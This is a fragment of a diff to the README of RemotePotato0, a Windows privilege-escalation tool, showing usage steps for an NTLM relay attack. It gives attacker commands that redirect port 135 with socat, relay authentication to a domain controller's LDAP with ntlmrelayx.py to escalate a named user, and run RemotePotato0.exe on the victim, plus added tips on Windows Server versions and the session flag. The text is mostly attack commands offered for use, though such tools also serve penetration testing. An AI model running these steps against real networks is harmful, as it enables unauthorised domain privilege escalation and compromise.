antonioCoco/RemotePotato0/README.md

 sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:192.168.83.131:9998 &
 sudo ntlmrelayx.py -t ldap://192.168.83.135 --no-wcf-server --escalate-user winrm_user_1
 ```
+**Note: if you are on Windows Server <= 2016 you can avoid the network redirector (socat) because the oxid resolution can be performed locally.**

 Victim machine (192.168.83.131):

 ```
 .\RemotePotato0.exe -r 192.168.83.130 -p 9998
 ```
+**Note2: Remember you can pick an arbitrary session activation with the -s flag, very powerful!**

 Victim Domain Controller (192.168.83.135)